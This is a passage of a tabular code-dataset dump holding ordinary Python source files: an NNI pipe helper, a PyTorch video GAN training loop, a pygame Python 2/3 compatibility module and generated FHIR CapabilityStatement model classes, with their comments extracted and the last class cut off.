content stringlengths 27 928k | path stringlengths 4 230 | size int64 27 928k | nl_text stringlengths 21 396k | nl_size int64 21 396k | nl_language stringlengths 2 3 | nl_language_score float64 0.04 1 |
|---|---|---|---|---|---|---|
from io import BufferedIOBase
import os
import sys
if sys.platform == 'win32':
import _winapi
import msvcrt
class WindowsPipe:
def __init__(self, experiment_id: str):
self.path: str = r'\\.\pipe\nni-' + experiment_id
self.file = None
self._handle = _winapi.CreateNamedPipe(
self.path,
_winapi.PIPE_ACCESS_DUPLEX,
_winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | _winapi.PIPE_WAIT,
1,
8192,
8192,
0,
_winapi.NULL
)
def connect(self) -> BufferedIOBase:
_winapi.ConnectNamedPipe(self._handle, _winapi.NULL)
fd = msvcrt.open_osfhandle(self._handle, 0)
self.file = os.fdopen(fd, 'w+b')
return self.file
def close(self) -> None:
if self.file is not None:
self.file.close()
Pipe = WindowsPipe
else:
import socket
from . import management
class UnixPipe:
def __init__(self, experiment_id: str):
self.path: str = str(management.create_experiment_directory(experiment_id) / 'dispatcher-pipe')
self.file = None
self._socket = socket.socket(socket.AF_UNIX)
self._socket.bind(self.path)
self._socket.listen(1) # only accepts one connection
def connect(self) -> BufferedIOBase:
conn, _ = self._socket.accept()
self.file = conn.makefile('rwb')
return self.file
def close(self) -> None:
if self.file is not None:
self.file.close()
self._socket.close()
os.unlink(self.path)
Pipe = UnixPipe
| nni/experiment/pipe.py | 1,779 | only accepts one connection | 27 | en | 0.827018 |
import os
import scipy.misc
import torch
import numpy as np
import torch.optim as optim
import config
import data_loader
import d_net
import loss_funs
import g_net
dtype = config.dtype
def save_samples(generated_images, iteration, prefix):
generated_images = generated_images.data.cpu().numpy()
num_images, channels, cell_h, cell_w = generated_images.shape
ncols = int(np.sqrt(num_images))
nrows = int(np.math.floor(num_images / float(ncols)))
result = np.zeros(
(cell_h * nrows, cell_w * ncols, channels), dtype=generated_images.dtype
)
for i in range(0, nrows):
for j in range(0, ncols):
result[
i * cell_h : (i + 1) * cell_h, j * cell_w : (j + 1) * cell_w, :
] = generated_images[i * ncols + j].transpose(1, 2, 0)
grid = result
if not os.path.exists("output"):
os.makedirs("output")
scipy.misc.imsave("output/{}_{:05d}.jpg".format(prefix, iteration), grid)
def main():
loss_fp = open("losses.csv", "w")
video_d_net = d_net.DiscriminatorModel(
kernel_sizes_list=d_net.SCALE_KERNEL_SIZES_D,
conv_layer_fms_list=d_net.SCALE_CONV_FMS_D,
scale_fc_layer_sizes_list=d_net.SCALE_FC_LAYER_SIZES_D,
)
video_d_net.type(dtype)
video_g_net = g_net.VideoGANGenerator()
video_g_net.type(dtype)
video_d_optimizer = optim.SGD(video_d_net.parameters(), lr=0.0001)
video_g_optimizer = optim.SGD(video_g_net.parameters(), lr=0.0001)
# Load Pacman dataset
max_size = len(os.listdir("train"))
pacman_dataloader = data_loader.DataLoader("train", max_size, 16, 32, 32, 4)
count = 0
for i in range(1, 5000):
clips_x, clips_y = pacman_dataloader.get_train_batch()
clips_x = torch.tensor(np.rollaxis(clips_x, 3, 1)).type(dtype)
clips_y = torch.tensor(np.rollaxis(clips_y, 3, 1)).type(dtype)
video_d_optimizer.zero_grad()
video_g_optimizer.zero_grad()
# batch_size x noise_size x 1 x 1
batch_size = 16
# WGAN loss
# https://github.com/keras-team/keras-contrib/blob/master/examples/improved_wgan.py
video_images = video_g_net(clips_x)
# TESTING: Vanilla Video Gan
video_d_loss_real = (video_d_net(clips_y) - 1).pow(2).mean()
video_d_loss_fake = (video_d_net(video_images)).pow(2).mean()
# Fake batch
labels = torch.zeros(batch_size, 4).t().unsqueeze(2).type(dtype)
video_d_loss_fake = loss_funs.adv_loss(
video_d_net(video_images), labels
) # TODO: Validate if it's right.
video_d_optimizer.zero_grad()
video_d_loss_fake.backward()
video_d_optimizer.step()
# Real batch
labels = torch.ones(batch_size, 4).t().unsqueeze(2).type(dtype)
video_d_loss_real = loss_funs.adv_loss(
video_d_net(clips_y), labels
) # TODO: Validate if it's right.
video_d_optimizer.zero_grad()
video_d_loss_real.backward()
video_d_optimizer.step()
# batch_size x noise_size x 1 x 1
batch_size = 16
# print('G_Time:', end - start)
# TESTING: Vanilla Video Gan
video_images = video_g_net(clips_x)
d_preds = video_d_net(video_images).type(
dtype
) # TODO: Make sure this is working.
gt_frames = clips_y.type(dtype) # TODO: make clips_y at different scales.
gen_frames = video_images.type(
dtype
) # TODO: make the generated frames multi scale.
video_g_loss = loss_funs.combined_loss(gen_frames, gt_frames, d_preds)
video_g_loss.backward()
video_g_optimizer.step()
if count % 20 == 0:
save_samples(clips_y, count, "video_real")
save_samples(video_images, count, "video_fake")
out_str = "{}, {}, {}, {}".format(
count, video_d_loss_real, video_d_loss_fake, video_g_loss
)
print(out_str)
loss_fp.write(out_str)
loss_fp.write("\n")
loss_fp.flush()
torch.save(video_g_net.state_dict(), "generator_net.pth.tmp")
count += 1
loss_fp.close()
# Final Generator save.
torch.save(video_g_net.state_dict(), "generator_net.pth")
if __name__ == "__main__":
main()
| process.py | 4,332 | Load Pacman dataset batch_size x noise_size x 1 x 1 WGAN loss https://github.com/keras-team/keras-contrib/blob/master/examples/improved_wgan.py TESTING: Vanilla Video Gan Fake batch TODO: Validate if it's right. Real batch TODO: Validate if it's right. batch_size x noise_size x 1 x 1 print('G_Time:', end - start) TESTING: Vanilla Video Gan TODO: Make sure this is working. TODO: make clips_y at different scales. TODO: make the generated frames multi scale. Final Generator save. | 481 | en | 0.599673 |
# coding: ascii
"""Python 2.x/3.x compatibility tools"""
import sys
__all__ = ['geterror', 'long_', 'xrange_', 'ord_', 'unichr_',
'unicode_', 'raw_input_', 'as_bytes', 'as_unicode',
'bytes_', 'imap_', 'PY_MAJOR_VERSION']
PY_MAJOR_VERSION = sys.version_info[0]
def geterror():
return sys.exc_info()[1]
# Python 3
if PY_MAJOR_VERSION >= 3:
long_ = int
xrange_ = range
from io import StringIO
from io import BytesIO
unichr_ = chr
unicode_ = str
bytes_ = bytes
raw_input_ = input
imap_ = map
# Represent escaped bytes and strings in a portable way.
#
# as_bytes: Allow a Python 3.x string to represent a bytes object.
# e.g.: as_bytes("a\x01\b") == b"a\x01b" # Python 3.x
# as_bytes("a\x01\b") == "a\x01b" # Python 2.x
# as_unicode: Allow a Python "r" string to represent a unicode string.
# e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes" # Python 2.x
# as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes" # Python 3.x
def as_bytes(string):
""" '<binary literal>' => b'<binary literal>' """
return string.encode('latin-1', 'strict')
def as_unicode(rstring):
""" r'<Unicode literal>' => '<Unicode literal>' """
return rstring.encode('ascii', 'strict').decode('unicode_escape',
'strict')
# Python 2
else:
long_ = long
xrange_ = xrange
from cStringIO import StringIO
BytesIO = StringIO
unichr_ = unichr
unicode_ = unicode
bytes_ = str
raw_input_ = raw_input
from itertools import imap as imap_
# Represent escaped bytes and strings in a portable way.
#
# as_bytes: Allow a Python 3.x string to represent a bytes object.
# e.g.: as_bytes("a\x01\b") == b"a\x01b" # Python 3.x
# as_bytes("a\x01\b") == "a\x01b" # Python 2.x
# as_unicode: Allow a Python "r" string to represent a unicode string.
# e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes" # Python 2.x
# as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes" # Python 3.x
def as_bytes(string):
""" '<binary literal>' => '<binary literal>' """
return string
def as_unicode(rstring):
""" r'<Unicode literal>' => u'<Unicode literal>' """
return rstring.decode('unicode_escape', 'strict')
def get_BytesIO():
return BytesIO
def get_StringIO():
return StringIO
def ord_(o):
try:
return ord(o)
except TypeError:
return o
if sys.platform == 'win32':
filesystem_errors = "replace"
elif PY_MAJOR_VERSION >= 3:
filesystem_errors = "surrogateescape"
else:
filesystem_errors = "strict"
def filesystem_encode(u):
fsencoding = sys.getfilesystemencoding()
if fsencoding.lower() in ['ascii', 'ansi_x3.4-1968'] and sys.platform.startswith('linux'):
# Don't believe Linux systems claiming ASCII-only filesystems. In
# practice, arbitrary bytes are allowed, and most things expect UTF-8.
fsencoding = 'utf-8'
return u.encode(fsencoding, filesystem_errors)
| Python_MiniGame_Fighter/venv/Lib/site-packages/pygame/compat.py | 3,214 | '<binary literal>' => b'<binary literal>'
'<binary literal>' => '<binary literal>'
r'<Unicode literal>' => '<Unicode literal>'
r'<Unicode literal>' => u'<Unicode literal>'
Python 2.x/3.x compatibility tools
coding: ascii Python 3 Represent escaped bytes and strings in a portable way. as_bytes: Allow a Python 3.x string to represent a bytes object. e.g.: as_bytes("a\x01\b") == b"a\x01b" Python 3.x as_bytes("a\x01\b") == "a\x01b" Python 2.x as_unicode: Allow a Python "r" string to represent a unicode string. e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes" Python 2.x as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes" Python 3.x Python 2 Represent escaped bytes and strings in a portable way. as_bytes: Allow a Python 3.x string to represent a bytes object. e.g.: as_bytes("a\x01\b") == b"a\x01b" Python 3.x as_bytes("a\x01\b") == "a\x01b" Python 2.x as_unicode: Allow a Python "r" string to represent a unicode string. e.g.: as_unicode(r"Bo\u00F6tes") == u"Bo\u00F6tes" Python 2.x as_unicode(r"Bo\u00F6tes") == "Bo\u00F6tes" Python 3.x Don't believe Linux systems claiming ASCII-only filesystems. In practice, arbitrary bytes are allowed, and most things expect UTF-8. | 1,227 | en | 0.538474 |
from .fhirbase import fhirbase
class CapabilityStatement(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
resourceType: This is a CapabilityStatement resource
url: An absolute URI that is used to identify this capability
statement when it is referenced in a specification, model, design or
an instance. This SHALL be a URL, SHOULD be globally unique, and
SHOULD be an address at which this capability statement is (or will
be) published. The URL SHOULD include the major version of the
capability statement. For more information see [Technical and Business
Versions](resource.html#versions).
version: The identifier that is used to identify this version of the
capability statement when it is referenced in a specification, model,
design or instance. This is an arbitrary value managed by the
capability statement author and is not expected to be globally unique.
For example, it might be a timestamp (e.g. yyyymmdd) if a managed
version is not available. There is also no expectation that versions
can be placed in a lexicographical sequence.
name: A natural language name identifying the capability statement.
This name should be usable as an identifier for the module by machine
processing applications such as code generation.
title: A short, descriptive, user-friendly title for the capability
statement.
status: The status of this capability statement. Enables tracking the
life-cycle of the content.
experimental: A boolean value to indicate that this capability
statement is authored for testing purposes (or
education/evaluation/marketing), and is not intended to be used for
genuine usage.
date: The date (and optionally time) when the capability statement
was published. The date must change if and when the business version
changes and it must change if the status code changes. In addition, it
should change when the substantive content of the capability statement
changes.
publisher: The name of the individual or organization that published
the capability statement.
contact: Contact details to assist a user in finding and communicating
with the publisher.
description: A free text natural language description of the
capability statement from a consumer's perspective. Typically, this is
used when the capability statement describes a desired rather than an
actual solution, for example as a formal expression of requirements as
part of an RFP.
useContext: The content was developed with a focus and intent of
supporting the contexts that are listed. These terms may be used to
assist with indexing and searching for appropriate capability
statement instances.
jurisdiction: A legal or geographic region in which the capability
statement is intended to be used.
purpose: Explaination of why this capability statement is needed and
why it has been designed as it has.
copyright: A copyright statement relating to the capability statement
and/or its contents. Copyright statements are generally legal
restrictions on the use and publishing of the capability statement.
kind: The way that this statement is intended to be used, to describe
an actual running instance of software, a particular product (kind not
instance of software) or a class of implementation (e.g. a desired
purchase).
instantiates: Reference to a canonical URL of another
CapabilityStatement that this software implements or uses. This
capability statement is a published API description that corresponds
to a business service. The rest of the capability statement does not
need to repeat the details of the referenced resource, but can do so.
software: Software that is covered by this capability statement. It
is used when the capability statement describes the capabilities of a
particular software version, independent of an installation.
implementation: Identifies a specific implementation instance that is
described by the capability statement - i.e. a particular
installation, rather than the capabilities of a software program.
fhirVersion: The version of the FHIR specification on which this
capability statement is based.
acceptUnknown: A code that indicates whether the application accepts
unknown elements or extensions when reading resources.
format: A list of the formats supported by this implementation using
their content types.
patchFormat: A list of the patch formats supported by this
implementation using their content types.
implementationGuide: A list of implementation guides that the server
does (or should) support in their entirety.
profile: A list of profiles that represent different use cases
supported by the system. For a server, "supported by the system" means
the system hosts/produces a set of resources that are conformant to a
particular profile, and allows clients that use its services to search
using this profile and to find appropriate data. For a client, it
means the system will search by this profile and process data
according to the guidance implicit in the profile. See further
discussion in [Using Profiles](profiling.html#profile-uses).
rest: A definition of the restful capabilities of the solution, if
any.
messaging: A description of the messaging capabilities of the
solution.
document: A document definition.
"""
__name__ = 'CapabilityStatement'
def __init__(self, dict_values=None):
self.resourceType = 'CapabilityStatement'
# type: str
# possible values: CapabilityStatement
self.url = None
# type: str
self.version = None
# type: str
self.name = None
# type: str
self.title = None
# type: str
self.status = None
# type: str
# possible values: draft, active, retired, unknown
self.experimental = None
# type: bool
self.date = None
# type: str
self.publisher = None
# type: str
self.contact = None
# type: list
# reference to ContactDetail
self.description = None
# type: str
self.useContext = None
# type: list
# reference to UsageContext
self.jurisdiction = None
# type: list
# reference to CodeableConcept
self.purpose = None
# type: str
self.copyright = None
# type: str
self.kind = None
# type: str
# possible values: instance, capability, requirements
self.instantiates = None
# type: list
self.software = None
# reference to CapabilityStatement_Software
self.implementation = None
# reference to CapabilityStatement_Implementation
self.fhirVersion = None
# type: str
self.acceptUnknown = None
# type: str
# possible values: no, extensions, elements, both
self.format = None
# type: list
self.patchFormat = None
# type: list
self.implementationGuide = None
# type: list
self.profile = None
# type: list
# reference to Reference: identifier
self.rest = None
# type: list
# reference to CapabilityStatement_Rest
self.messaging = None
# type: list
# reference to CapabilityStatement_Messaging
self.document = None
# type: list
# reference to CapabilityStatement_Document
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'active', 'retired', 'unknown']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, active, retired, unknown'))
if self.kind is not None:
for value in self.kind:
if value is not None and value.lower() not in [
'instance', 'capability', 'requirements']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'instance, capability, requirements'))
if self.acceptUnknown is not None:
for value in self.acceptUnknown:
if value is not None and value.lower() not in [
'no', 'extensions', 'elements', 'both']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'no, extensions, elements, both'))
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Rest',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'rest'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'contact'},
{'parent_entity': 'CapabilityStatement_Software',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'software'},
{'parent_entity': 'CapabilityStatement_Implementation',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'implementation'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement',
'child_variable': 'profile'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'jurisdiction'},
{'parent_entity': 'CapabilityStatement_Document',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'document'},
{'parent_entity': 'CapabilityStatement_Messaging',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'messaging'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement',
'child_variable': 'useContext'},
]
class CapabilityStatement_Software(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: Name software is known by.
version: The version identifier for the software covered by this
statement.
releaseDate: Date this version of the software was released.
"""
__name__ = 'CapabilityStatement_Software'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.version = None
# type: str
self.releaseDate = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Implementation(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
description: Information about the specific installation that this
capability statement relates to.
url: An absolute base URL for the implementation. This forms the base
for REST interfaces as well as the mailbox and document interfaces.
"""
__name__ = 'CapabilityStatement_Implementation'
def __init__(self, dict_values=None):
self.description = None
# type: str
self.url = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Rest(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Identifies whether this portion of the statement is describing
the ability to initiate or receive restful operations.
documentation: Information about the system's restful capabilities
that apply across all applications, such as security.
security: Information about security implementation from an interface
perspective - what a client needs to know.
resource: A specification of the restful capabilities of the solution
for a specific resource type.
interaction: A specification of restful operations supported by the
system.
searchParam: Search parameters that are supported for searching all
resources for implementations to support and/or make use of - either
references to ones defined in the specification, or additional ones
defined for/by the implementation.
operation: Definition of an operation or a named query together with
its parameters and their meaning and type.
compartment: An absolute URI which is a reference to the definition of
a compartment that the system supports. The reference is to a
CompartmentDefinition resource by its canonical URL .
"""
__name__ = 'CapabilityStatement_Rest'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: client, server
self.documentation = None
# type: str
self.security = None
# reference to CapabilityStatement_Security
self.resource = None
# type: list
# reference to CapabilityStatement_Resource
self.interaction = None
# type: list
# reference to CapabilityStatement_Interaction1
self.searchParam = None
# type: list
# reference to CapabilityStatement_SearchParam
self.operation = None
# type: list
# reference to CapabilityStatement_Operation
self.compartment = None
# type: list
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'client', 'server']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'client, server'))
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_SearchParam',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'searchParam'},
{'parent_entity': 'CapabilityStatement_Interaction1',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'interaction'},
{'parent_entity': 'CapabilityStatement_Security',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'security'},
{'parent_entity': 'CapabilityStatement_Resource',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'resource'},
{'parent_entity': 'CapabilityStatement_Operation',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Rest',
'child_variable': 'operation'},
]
class CapabilityStatement_Security(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
cors: Server adds CORS headers when responding to requests - this
enables javascript applications to use the server.
service: Types of security services that are supported/required by the
system.
description: General description of how security works.
certificate: Certificates associated with security profiles.
"""
__name__ = 'CapabilityStatement_Security'
def __init__(self, dict_values=None):
self.cors = None
# type: bool
self.service = None
# type: list
# reference to CodeableConcept
self.description = None
# type: str
self.certificate = None
# type: list
# reference to CapabilityStatement_Certificate
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Certificate',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Security',
'child_variable': 'certificate'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Security',
'child_variable': 'service'},
]
class CapabilityStatement_Certificate(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: Mime type for a certificate.
blob: Actual certificate.
"""
__name__ = 'CapabilityStatement_Certificate'
def __init__(self, dict_values=None):
self.type = None
# type: str
self.blob = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
class CapabilityStatement_Resource(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: A type of resource exposed via the restful interface.
profile: A specification of the profile that describes the solution's
overall support for the resource, including any constraints on
cardinality, bindings, lengths or other limitations. See further
discussion in [Using Profiles](profiling.html#profile-uses).
documentation: Additional information about the resource type used by
the system.
interaction: Identifies a restful operation supported by the solution.
versioning: This field is set to no-version to specify that the system
does not support (server) or use (client) versioning for this resource
type. If this has some other value, the server must at least correctly
track and populate the versionId meta-property on resources. If the
value is 'versioned-update', then the server supports all the
versioning features, including using e-tags for version integrity in
the API.
readHistory: A flag for whether the server is able to return past
versions as part of the vRead operation.
updateCreate: A flag to indicate that the server allows or needs to
allow the client to create new identities on the server (e.g. that is,
the client PUTs to a location where there is no existing resource).
Allowing this operation means that the server allows the client to
create new identities on the server.
conditionalCreate: A flag that indicates that the server supports
conditional create.
conditionalRead: A code that indicates how the server supports
conditional read.
conditionalUpdate: A flag that indicates that the server supports
conditional update.
conditionalDelete: A code that indicates how the server supports
conditional delete.
referencePolicy: A set of flags that defines how references are
supported.
searchInclude: A list of _include values supported by the server.
searchRevInclude: A list of _revinclude (reverse include) values
supported by the server.
searchParam: Search parameters for implementations to support and/or
make use of - either references to ones defined in the specification,
or additional ones defined for/by the implementation.
"""
__name__ = 'CapabilityStatement_Resource'
def __init__(self, dict_values=None):
self.type = None
# type: str
self.profile = None
# reference to Reference: identifier
self.documentation = None
# type: str
self.interaction = None
# type: list
# reference to CapabilityStatement_Interaction
self.versioning = None
# type: str
# possible values: no-version, versioned, versioned-update
self.readHistory = None
# type: bool
self.updateCreate = None
# type: bool
self.conditionalCreate = None
# type: bool
self.conditionalRead = None
# type: str
# possible values: not-supported, modified-since, not-match,
# full-support
self.conditionalUpdate = None
# type: bool
self.conditionalDelete = None
# type: str
# possible values: not-supported, single, multiple
self.referencePolicy = None
# type: list
# possible values: literal, logical, resolves, enforced, local
self.searchInclude = None
# type: list
self.searchRevInclude = None
# type: list
self.searchParam = None
# type: list
# reference to CapabilityStatement_SearchParam
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.versioning is not None:
for value in self.versioning:
if value is not None and value.lower() not in [
'no-version', 'versioned', 'versioned-update']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'no-version, versioned, versioned-update'))
if self.conditionalRead is not None:
for value in self.conditionalRead:
if value is not None and value.lower() not in [
'not-supported', 'modified-since', 'not-match', 'full-support']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'not-supported, modified-since, not-match, full-support'))
if self.conditionalDelete is not None:
for value in self.conditionalDelete:
if value is not None and value.lower() not in [
'not-supported', 'single', 'multiple']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'not-supported, single, multiple'))
if self.referencePolicy is not None:
for value in self.referencePolicy:
if value is not None and value.lower() not in [
'literal', 'logical', 'resolves', 'enforced', 'local']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'literal, logical, resolves, enforced, local'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'profile'},
{'parent_entity': 'CapabilityStatement_SearchParam',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'searchParam'},
{'parent_entity': 'CapabilityStatement_Interaction',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Resource',
'child_variable': 'interaction'},
]
class CapabilityStatement_Interaction(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: Coded identifier of the operation, supported by the system
resource.
documentation: Guidance specific to the implementation of this
operation, such as 'delete is a logical delete' or 'updates are only
allowed with version id' or 'creates permitted from pre-authorized
certificates only'.
"""
__name__ = 'CapabilityStatement_Interaction'
def __init__(self, dict_values=None):
self.code = None
# type: str
# possible values: read, vread, update, patch, delete,
# history-instance, history-type, create, search-type
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.code is not None:
for value in self.code:
if value is not None and value.lower() not in [
'read', 'vread', 'update', 'patch', 'delete', 'history-instance',
'history-type', 'create', 'search-type']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'read, vread, update, patch, delete, history-instance, '
'history-type, create, search-type'))
class CapabilityStatement_SearchParam(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the search parameter used in the interface.
definition: An absolute URI that is a formal reference to where this
parameter was first defined, so that a client can be confident of the
meaning of the search parameter (a reference to
[[[SearchParameter.url]]]).
type: The type of value a search parameter refers to, and how the
content is interpreted.
documentation: This allows documentation of any distinct behaviors
about how the search parameter is used. For example, text matching
algorithms.
"""
__name__ = 'CapabilityStatement_SearchParam'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.definition = None
# type: str
self.type = None
# type: str
# possible values: number, date, string, token, reference,
# composite, quantity, uri
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.type is not None:
for value in self.type:
if value is not None and value.lower() not in [
'number', 'date', 'string', 'token', 'reference', 'composite',
'quantity', 'uri']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'number, date, string, token, reference, composite, quantity, uri'))
class CapabilityStatement_Interaction1(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of the operation, supported by the system.
documentation: Guidance specific to the implementation of this
operation, such as limitations on the kind of transactions allowed, or
information about system wide search is implemented.
"""
__name__ = 'CapabilityStatement_Interaction1'
def __init__(self, dict_values=None):
self.code = None
# type: str
# possible values: transaction, batch, search-system,
# history-system
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.code is not None:
for value in self.code:
if value is not None and value.lower() not in [
'transaction', 'batch', 'search-system', 'history-system']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'transaction, batch, search-system, history-system'))
class CapabilityStatement_Operation(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the operation or query. For an operation, this is
the name prefixed with $ and used in the URL. For a query, this is
the name used in the _query parameter when the query is called.
definition: Where the formal definition can be found.
"""
__name__ = 'CapabilityStatement_Operation'
def __init__(self, dict_values=None):
self.name = None
# type: str
self.definition = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Operation',
'child_variable': 'definition'},
]
class CapabilityStatement_Messaging(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
endpoint: An endpoint (network accessible address) to which messages
and/or replies are to be sent.
reliableCache: Length if the receiver's reliable messaging cache in
minutes (if a receiver) or how long the cache length on the receiver
should be (if a sender).
documentation: Documentation about the system's messaging capabilities
for this endpoint not otherwise documented by the capability
statement. For example, the process for becoming an authorized
messaging exchange partner.
supportedMessage: References to message definitions for messages this
system can send or receive.
event: A description of the solution's support for an event at this
end-point.
"""
__name__ = 'CapabilityStatement_Messaging'
def __init__(self, dict_values=None):
self.endpoint = None
# type: list
# reference to CapabilityStatement_Endpoint
self.reliableCache = None
# type: int
self.documentation = None
# type: str
self.supportedMessage = None
# type: list
# reference to CapabilityStatement_SupportedMessage
self.event = None
# type: list
# reference to CapabilityStatement_Event
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CapabilityStatement_Endpoint',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'endpoint'},
{'parent_entity': 'CapabilityStatement_SupportedMessage',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'supportedMessage'},
{'parent_entity': 'CapabilityStatement_Event',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Messaging',
'child_variable': 'event'},
]
class CapabilityStatement_Endpoint(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
protocol: A list of the messaging transport protocol(s) identifiers,
supported by this endpoint.
address: The network address of the end-point. For solutions that do
not use network addresses for routing, it can be just an identifier.
"""
__name__ = 'CapabilityStatement_Endpoint'
def __init__(self, dict_values=None):
self.protocol = None
# reference to Coding
self.address = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Endpoint',
'child_variable': 'protocol'},
]
class CapabilityStatement_SupportedMessage(fhirbase):
"""
